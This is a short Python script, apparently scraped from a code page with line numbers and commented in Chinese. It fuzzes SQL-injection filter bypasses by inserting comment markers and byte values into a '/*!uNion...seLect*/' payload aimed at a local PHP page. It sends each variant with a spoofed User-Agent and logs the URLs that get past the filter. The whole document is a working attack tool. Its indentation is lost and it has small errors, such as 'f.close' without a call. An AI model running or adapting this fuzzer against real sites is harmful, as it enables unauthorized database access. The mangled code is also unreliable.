1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
| #encoding=utf-8
import requests
import random
url = "http://192.168.235.133/2.php?a=1"
Fuzz_a = ['/*!14450','*/','/**/','/','-','+']
#Fuzz_a = ['']
Fuzz_b = ['']
#Fuzz_c = ['%0a','%0b','%0c','%0d','%0e','%0f','%0h','%0i','%0j']
Fuzz_c = []
for line in open('HexValsAllBytes.txt','r').readlines():
Fuzz_c.append(line.strip('\n'))
FUZZ = Fuzz_a+Fuzz_b+Fuzz_c
#配置fuzz字典
header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}
#设置请求的headers
for a in FUZZ:
pass
for b in FUZZ:
pass
for c in FUZZ:
for d in FUZZ:
pass
for e in FUZZ:
pass
PYLOAD = "/*!uNion"+a+b+c+d+e+"seLect*/1,3333"
urlp = url+PYLOAD
#print(urlp)
res = requests.get(urlp,headers=header)
#print(res.text)
#使用for排列组合fuzz字典并请求页面
if '1xiaobai13333' in res.text: #这个flag需要改,根据你测的正常页面中,有什么字段是必然出现的
print ("[*]URL:"+ urlp +"BYPASS!")
f=open('result.txt','a')
f.write(urlp+"\n")
f.close
|
